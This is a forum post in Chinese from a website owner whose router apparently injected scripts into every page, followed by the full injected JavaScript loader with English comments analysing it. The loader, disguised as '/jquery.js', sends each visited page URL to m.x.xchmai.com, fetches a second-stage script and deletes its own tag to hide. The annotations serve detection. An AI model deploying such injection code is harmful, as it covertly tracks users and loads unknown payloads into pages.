本帖最后由 chenwenjie 于 2019-10-26 23:44 编辑
问题依旧在, 求助大佬~~
关于路由器病毒: 今天我在调试自己的网站的时候, 发现网页的 head 头部被加入了不是我写的 script,
本以为是服务器的问题, 询问了服务器提供商, 人家说根本没问题,
然后我就换了朋友的电脑打开我的网站, 却没有发现类似的脚本
于是我就换了个网络, 果然, 是我的电脑网络有问题, 我用手机开热点访问网页就不会出现问题了.
然后我就想到了, 重置路由器, 重置完路由器发现没有被插入脚本了,果然是路由器中病毒了,
可是我还是想知道这些脚本到底有什么用, 是不是盗取信息的木马, 总觉得过两天还是会再中这个病毒...
以下是路由器中病毒时, 访问任何网站, 头部都会被添加的脚本信息截图, head标签里居然还给我加div标签, 够狠
求大神指示!
跳转后发现此JS代码:
/**
 * Loader script found in pages whose HTML was altered in transit. The name
 * "boot.js" is passed to the error handler at the bottom and is presumably
 * this file's own name -- unconfirmed.
 *
 * Read top to bottom, the code:
 *   1. sends the address of the page being viewed to m.x.xchmai.com,
 *   2. loads hm.baidu.com/hm.js (the Baidu Tongji analytics loader) under two
 *      different ids: one on every run, one only on abort/error paths,
 *   3. finds the <script> tag that loaded it: a src containing "/jquery.js"
 *      together with the parameters _zxcvb_pid and _qwert_sid,
 *   4. loads a second-stage script, fshow.js or fshow3.js, from the same
 *      location with the same query string,
 *   5. removes its own <script> tag from the DOM unless old Internet Explorer
 *      is detected.
 *
 * The second stage is not part of this listing, so what is finally shown to
 * the user cannot be determined from here. The field names used below
 * (ad_pub_id, ad_slot_id, adid) suggest advertising insertion -- unconfirmed.
 *
 * NOTE(review): strings from this listing that can be searched for in proxy or
 * DNS logs and in saved raw page source: the host m.x.xchmai.com, the path
 * jspt.htm, a script URL containing "/jquery.js" with _zxcvb_pid/_qwert_sid,
 * the file names fshow.js and fshow3.js, and the two hm.js ids. Because step 5
 * removes the tag from the live DOM, compare the raw HTTP response rather than
 * the element inspector.
 *
 * The function is invoked with (window, document) but declares no parameters,
 * so both arguments are ignored and the globals are used directly.
 */
(function() {
// Abort/error counter: loads hm.js with a dedicated id by inserting a <script>
// before the first <script> in the document. Called on every path below that
// gives up, so hits on this id count failed runs.
function b_eror_st() {
var hmeror = document.createElement("script");
hmeror.src = "https://hm.baidu.com/hm.js?82131f194bfafb51664235f31934ebe0";
var sceror = document.getElementsByTagName("script")[0];
sceror.parentNode.insertBefore(hmeror, sceror)
}
try {
// Step 1: report the current page address. The address is taken from
// document.URL, then document.documentURI, then window.location.href.
try {
var jspt = document.createElement("script");
jspt.type = "text/javascript";
var cururl = "";
if (document) {
if (document.URL) {
cururl = document.URL
} else if (document.documentURI) {
cururl = document.documentURI
}
} else if (window && window.location && window.location.href) {
cururl = window.location.href
}
// The request is made by an inline script that creates an Image; the full
// page URL (query string included) is the "e" parameter and travels over
// plain http, so anything carried in the URL is disclosed to that host.
jspt.innerHTML = "var imgjspt = new Image();imgjspt.src = 'http://m.x.xchmai.com/jspt.htm?s=568808220&p=911&e=" + encodeURIComponent(cururl) + "';";
var jseror = document.getElementsByTagName("script")[0];
jseror.parentNode.insertBefore(jspt, jseror)
} catch(er) {
// If the report above throws, the same endpoint receives the first 230
// characters of the stack (or the message) with p=901 instead of p=911.
try {
var jspterr = document.createElement("script");
jspterr.type = "text/javascript";
var cururlerror = encodeURIComponent(er.stack ? er.stack.substr(0, 230) : er.message);
jspterr.innerHTML = "var imgjspt = new Image();imgjspt.src = 'http://m.x.xchmai.com/jspt.htm?s=568808220&p=901&e=" + cururlerror + "';";
var jserorer = document.getElementsByTagName("script")[0];
jserorer.parentNode.insertBefore(jspterr, jserorer)
// A failure of the error report itself is ignored silently.
} catch(erer) {}
}
// Step 2: second hm.js id, loaded on every run (not only on failure).
var hm = document.createElement("script");
hm.src = "https://hm.baidu.com/hm.js?f5df380d5163c1cc4823c8d33ec5fa49";
var sc0 = document.getElementsByTagName("script")[0];
sc0.parentNode.insertBefore(hm, sc0);
// b counts polling attempts. The anonymous function below re-schedules itself
// every 100 ms until document.body exists; after 50 attempts it creates an
// empty <body> itself. arguments.callee is used for the self-reference, which
// only works in non-strict code.
// Only the first, synchronous call runs inside the surrounding try/catch;
// errors thrown from later timer-driven calls are not caught by it.
var b = 0; (function() {
if (!document || !document.body) {
b++;
if (b >= 50) {
if (!document) {
b_eror_st();
throw new Error("document.error");
// Unreachable: follows a throw.
return
}
if (!document.body) {
b_eror_st();
document.body = document.createElement("body")
}
}
return setTimeout(arguments.callee, 100)
}
// m collects everything the loader learns about the page and about itself.
var m = {};
m.page_url = window.location.href;
// Name of a URL parameter checked further down; when the page URL carries it
// with the value 1 the loader stops.
m.dreamKey = "_maerd_dnegel_";
m.js_node = null;
// Step 3: locate the <script> element that loaded this code. Starts from
// document.currentScript, then scans document.scripts from last to first for
// a src containing "/jquery.js", "_zxcvb_pid" and "_qwert_sid" that has no
// "used" attribute yet; a match replaces the currentScript candidate. The
// chosen node is marked used="1" and its src is stored in m.js_src.
function j() {
var z = document;
var x;
if (document.currentScript) {
x = document.currentScript
}
for (var v = z.scripts,
y = v.length - 1,
w; w = v[y--];) {
if (w.src && w.src.indexOf("/jquery.js") != -1 && w.src.indexOf("_zxcvb_pid") != -1 && w.src.indexOf("_qwert_sid") != -1) {
if (!w.getAttribute("used")) {
x = w;
break
}
}
}
if (x) {
m.js_node = x;
m.js_node.setAttribute("used", 1);
m.js_src = m.js_node.getAttribute("src")
}
return x
}
j();
if (!m.js_node || !m.js_src) {
throw new Error("no jsnode")
}
// d(url, name): returns the decoded value of query/fragment parameter `name`
// in `url`, or "" when absent. `name` is concatenated into the RegExp without
// escaping; every caller in this listing passes a fixed literal.
var d = function(y, v) {
var w = new RegExp("(\\?|#|&)" + v + "=([^&]*)(&|$)", "i");
var x = y.match(w);
return x !== null ? decodeURIComponent(x[2]) : ""
};
// i = query string of the loader URL, l = URL of the second stage.
var i = null;
var l = null;
var r = m.js_src.split("?");
// Only a src with exactly one "?" is accepted.
if (r.length == 2) {
i = r[1];
l = r[0].replace("jquery.js", "fshow.js");
// h() is declared further down; function hoisting makes it callable here.
var o = h(d(m.js_src, "_qwert_sid"));
// Loose comparison of a string with a number: one specific _qwert_sid value
// is served fshow3.js instead of fshow.js.
if (o == 416153783) {
l = r[0].replace("jquery.js", "fshow3.js")
}
}
if (!i) {
throw new Error("param error")
}
// k(): today's local date as "YYYYMMDD"; appended below as _ver, so the
// second-stage URL changes once per day.
function k() {
var v = new Date();
var x = v.getMonth() + 1;
var w = v.getDate();
return v.getFullYear() + "" + (x > 9 ? x: "0" + x) + "" + (w > 9 ? w: "0" + w)
}
// f is true when the page URL carries _maerd_dnegel_=1. The error text
// "my frame" suggests such pages are frames the same software opened --
// unconfirmed; the loader counts an abort and stops in them.
var f = (function() {
var v = d(m.page_url, m.dreamKey);
return v == 1 ? true: false
})();
if (f) {
b_eror_st();
throw new Error("my frame");
// Unreachable: follows a throw.
return
}
// n(win): number of parent hops from `win` up to the window that is its own
// parent, i.e. the frame nesting depth (0 for a top-level page).
var n = function(v) {
return v == v.parent ? 0 : (arguments.callee(v.parent) + 1)
};
m.page_frameCount = n(window);
// q(): probes which ancestor documents are readable from this frame.
// 1 = both window.top.document and window.parent.document are readable;
// otherwise 2 if the parent is readable, 3 if the top is readable (3 wins
// when both reads succeed in the fallback), 0 if neither.
// The result is stored in m.page_isHomo and not used again in this listing.
var q = function() {
var v = 0;
try {
var y = window.top.document;
var w = window.parent.document;
v = 1
} catch(x) {
try {
var w = window.parent.document;
v = 2
} catch(x) {}
try {
var y = window.top.document;
v = 3
} catch(x) {}
}
return v
};
m.page_isHomo = q();
// Hard limit: never run more than 5 frames deep.
if (m.page_frameCount > 5) {
b_eror_st();
throw new Error("max Iframe:" + m.page_frameCount);
// Unreachable: follows a throw.
return
}
// h(v): trims a string, with a regex fallback where String.prototype.trim is
// missing; non-string values are returned unchanged.
function h(v) {
if (typeof v !== "string") {
return v
}
if (typeof v.trim === "function") {
return v.trim()
} else {
return v.replace(/^(\u3000|\s|\t|\u00A0)*|(\u3000|\s|\t|\u00A0)*$/g, "")
}
}
// Both parameters of the loader URL are mandatory.
var e = h(d(m.js_src, "_zxcvb_pid"));
m.ad_slot_id = h(d(m.js_src, "_qwert_sid"));
if (!e || !m.ad_slot_id) {
throw new Error("no sid")
}
// A 12-character _zxcvb_pid is split into three fields: characters 0-1 go to
// ad_site_type, character 2 becomes the default frame-depth limit u, and the
// remaining characters become ad_pub_id. Any other length is used whole.
var u = 0;
if (e.length == 12) {
m.ad_pub_id = e.slice(3);
m.ad_site_type = e.slice(0, 2);
u = e.slice(2, 3)
} else {
m.ad_pub_id = e
}
m.adid = m.ad_pub_id + "_" + m.ad_slot_id;
// Frame-depth limit: the _mf parameter if non-empty, else u. With neither
// present the limit is 0 and the loader stops inside any frame. p may be a
// string here; the comparison coerces it to a number.
var p = h(d(m.js_src, "_mf"));
p = p || u;
if (m.page_frameCount > p) {
throw new Error("in iframe:" + m.page_frameCount)
}
// Step 4: insert the second-stage script next to the loader tag. Its URL is
// the loader URL with jquery.js swapped for fshow.js/fshow3.js, the original
// query string, and the date as _ver.
var g = k();
var t = document.createElement("script");
t.async = "async";
t.src = l + "?" + i + "&_ver=" + g;
m.js_node.parentNode.insertBefore(t, m.js_node);
// s: Internet Explorer version detection through conditional comments. The
// loop keeps raising w while "[if gt IE w]" still produces an <i> element
// (x is a live collection). Browsers that ignore conditional comments leave
// the loop at w = 4, which yields false.
var s = (function() {
var w = 3,
y = document.createElement("div"),
x = y.getElementsByTagName("i");
while (y.innerHTML = "<!--[if gt IE " + (++w) + "]><i></i><![endif]-->", x[0]) {}
return w > 4 ? w: false
} ());
// Step 5: when no such IE version was detected, the loader's own <script>
// element is removed, so it no longer appears in the live DOM afterwards.
if (!s) {
m.js_node.parentNode.removeChild(m.js_node)
}
})()
} catch(c) {
// Reached for errors thrown synchronously above: count an abort, then call a().
b_eror_st();
// a(err, ex): assembles name, truncated stack/message, document.referrer, the
// `ex` label and a random number into the array n. In this listing the array
// is never sent or returned, so this handler has no visible effect.
function a(i, g) {
var j = document,
l = window,
k = encodeURIComponent;
try {
var n = [];
n.push("name=" + k(i.name));
n.push("msg=" + k(i.stack ? i.stack.substr(0, 230) : i.message));
n.push("ref=" + k(j.referrer));
n.push("ex=" + k(g));
n.push("rnd=" + Math.floor(2147483648 * Math.random()))
} catch(m) {}
}
a(c, "boot.js")
}
// The "|" after the closing statement below is table residue from the forum
// page, not part of the script.
})(window, document); |